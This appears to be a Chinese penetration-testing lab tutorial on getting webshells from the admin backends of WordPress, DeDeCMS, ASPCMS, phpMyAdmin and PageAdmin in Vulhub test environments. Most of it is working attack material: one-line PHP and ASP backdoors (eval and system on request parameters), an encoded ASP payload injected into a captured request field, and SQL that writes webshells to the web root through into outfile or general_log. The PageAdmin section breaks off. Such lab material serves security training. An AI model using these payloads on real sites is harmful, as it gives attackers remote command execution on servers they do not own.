目录
一:WordPress
步骤一:进入Vulhub靶场并执行以下命令开启靶场;在浏览器中访问并安装好子...
步骤二:思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登陆WP后点击【外观】--》【编辑】 --》 404.php
步骤三:访问以下连接即可获取WebShel...
姿势二:上传主题拿WebShell
步骤一:接着上一个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP文件...点击【外观】 --》【主题】 --》【添加】--》【上传主题】--》【浏览】--》【现在安装】
步骤二:安装成功后访问主题下的网站后门文件..
二:DeDeCMS
姿势一:通过文件管理器上传WebShell
步骤一:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshell...
步骤二:登陆到后台点击【核心】--》【文件式管理器】【文件上传】将准备好的一句话代
码上传...OK
步骤三:访问上传成功后的文件并使用蚁剑连接测试...
姿势二:修改模板文件拿WebShel
步骤一:与WPCMS类似,直接修改模板拿WebShel.点击【模板】-》【默认模板管理】--》【index.htm】-->【修改】在文件修改中添加一句话代码…如下
步骤二:点击 【生成】--》点击【更新主页HTML】--》将主页位置修改为【../index.php 】--》【生成静态】--》点击【更新主页】 再次访问站点首页可发现变化...
步骤三:使用蚁剑进行连接测试.
姿势三:后台任意命令执行拿WebShell
步骤一:点击 【模块】--》【广告管理】--》【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】
步骤二:点击【代码】--》在图中显示的路径与站点进行拼接..访问测试!
步骤三:使用蚁剑连接测试...
三:ASPCMS
姿势一:后台修改配置文件拿Shell
步骤一:访问以下地址为ASPCMS.并登陆到后台(这里注意在搭建站点的时候注意权限问题)
步骤二:点击【扩展功能】--》【幻灯片设置】--》点击 【保存】--》开启代理进行抓包
步骤三:在抓取的数据包中修改 slideTextstatus 字段的值为以下代码并进行发包查看被修改的asp文件内容...
步骤四:访问以下地址进行连接...
四、PHPMyadmin
姿势⼀:通过⽇志⽂件拿Shell
姿势⼆:导⼊导出拿WebShell
1.首先判断mysql位置
2.猜测web路径
3.写webshell
4.浏览器
姿势三:界面图像化GetShell
五、Pageadmin
步骤一:准备一个一句话木马的asp文件,然后压缩成zip格式。
步骤二:点击【⼯具】--》 【⽂件管理】--》 【功能菜单】 --》【上传⽂件】
步骤三:解压文件。
步骤四:使用工具连接。
一:WordPress
步骤一:进入Vulhub靶场并执行以下命令开启靶场;在浏览器中访问并安装好子...
#执行命令
cd /vulhub/wordpress/pwnscriptumdocker-compose up -d
#靶场地址
http://192.168.4.176:8080/wp-admin/
步骤二:思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登陆WP后点击【外观】--》【编辑】 --》 404.php
在其404模板中插入一句话木马代码.点击【更新文件】按钮
<?php eval($ POST['cmd']);?>
步骤三:访问以下连接即可获取WebShel...
#拼接路径
/wp-content/themes/twentyfifteen/404.php
#访问连接
http://192.168.4.176:8080//wp-content/themes/twentyfifteen/404.php
http://192.168.4.176:8080//wp-content/themes/twentyfifteen/404.php
菜刀连接:
姿势二:上传主题拿WebShell
步骤一:接着上一个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP文件...点击【外观】 --》【主题】 --》【添加】--》【上传主题】--》【浏览】--》【现在安装】
主题文件
步骤二:安装成功后访问主题下的网站后门文件..
#拼接路径
/wp-content/themes/ Farallon-develop-v0.3.8/shell.php
#访问地址
http://192.168.4.176:8080/wp-content/themes/ Farallon-develop-v0.3.8/shell.php
#蚁剑连接
二:DeDeCMS
漏洞复现
姿势一:通过文件管理器上传WebShell
步骤一:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshell...
#前台
http://192.168.4.139/dedecms/index.php?upcache=1
http://192.168.4.139/dedecms/index.php?upcache=1
http://192.168.4.139/dedecms/index.php?upcache=1
#后台
http://192.168.4.139/dedecms/dede/
http://192.168.4.139/dedecms/dede/
http://192.168.4.139/dedecms/dede/
#信息
username:admin
password:admin
步骤二:登陆到后台点击【核心】--》【文件式管理器】【文件上传】将准备好的一句话代
码上传...OK
步骤三:访问上传成功后的文件并使用蚁剑连接测试...
#文件地址
http://127.0.0.1/uploads/uploads/shell.php
http://127.0.0.1/uploads/uploads/shell.php
http://127.0.0.1/uploads/uploads/shell.php
姿势二:修改模板文件拿WebShel
步骤一:与WPCMS类似,直接修改模板拿WebShel.点击【模板】-》【默认模板管理】--》【index.htm】-->【修改】在文件修改中添加一句话代码…如下
步骤二:点击 【生成】--》点击【更新主页HTML】--》将主页位置修改为【../index.php 】--》【生成静态】--》点击【更新主页】 再次访问站点首页可发现变化...
步骤三:使用蚁剑进行连接测试.
#地址
http://127.0.0.1/uploads/index.php
http://127.0.0.1/uploads/index.php
http://127.0.0.1/uploads/index.php
姿势三:后台任意命令执行拿WebShell
步骤一:点击 【模块】--》【广告管理】--》【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】
步骤二:点击【代码】--》在图中显示的路径与站点进行拼接..访问测试!
http://127.0.0.1/dedecms/plus/ad js.php?aid=1
步骤三:使用蚁剑连接测试...
三:ASPCMS
ASPCMS是由上谷网络开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。
漏洞复现
姿势一:后台修改配置文件拿Shell
步骤一:访问以下地址为ASPCMS.并登陆到后台(这里注意在搭建站点的时候注意权限问题)
#网站后台
http://192.168.4.139/admin_aspcms/login.asp //全功能版本
#账户密码
username:admin
password:123456
步骤二:点击【扩展功能】--》【幻灯片设置】--》点击 【保存】--》开启代理进行抓包
步骤三:在抓取的数据包中修改 slideTextstatus 字段的值为以下代码并进行发包查看被修改的asp文件内容...
#字段值
1%25><%25Eval(Request(chr(65)))%25><%25 #密码是a
#影响文件
/config/AspCms _Config.asp
步骤四:访问以下地址进行连接...
http://192.168.207.130:81/config//AspCms_Config.asp
四、PHPMyadmin
姿势⼀:通过⽇志⽂件拿Shell
利⽤mysql⽇志⽂件写shell,这个⽇志可以在mysql⾥改变它的存放位置,登录phpmyadmin可以修改这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取⼀个webshell 。
show global variables like '%general%';
set global general_log='on';set global general_log_file = 'E:/phpstudy_pro/WWW/mafa.php'
select '<?php phpinfo();?>';
php代码执行成功!
姿势⼆:导⼊导出拿WebShell
思路:通过SQL语句拿webshell ⽤into outfile把后⻔写到⽹站⽬录上。
1.首先判断mysql位置
select @@datadir
路径: E:\phpstudy_pro\Extensions\MySQL5.7.26\data\
2.猜测web路径
猜测web路径: E:\phpstudy_pro\WWW
E:\phpstudy\WWW\web.php
3.写webshell
select "<?php phpinfo(); eval($_POST[a]);?>" into outfile 'E:/phpstudy_pro/WWW/a.php ';select "<?php phpinfo(); system($_GET[a]);?>" into outfile 'E:/phpstudy_pro/WWW/b.php';
4.浏览器
http://127.0.0.1/b.php?a=dir ..\
备注:/
不要用\,如里要用\\(转义)
姿势三:界面图像化GetShell
如果过滤了 into outfile 第一种的图形化操作..
phpmyadmin管理台
变量:日志 搜索:gen
log:on
file: E:/phpstudy_pro/WWW/mafa.php
sql:
select “<?php eval($_POST[‘cmd’]);?>”;
五、Pageadmin
PageAdmin CMS系统是基于.Net的⽹站管理系统,安全、稳定、灵活,全国⽤户超过百万,致⼒于为企业、学校、政府⽹站建设和⽹站制作提供企业级内容管理系统解决⽅案。
源码⽂件+MSSQL(SA/Rsec123456)
登录到管理员后台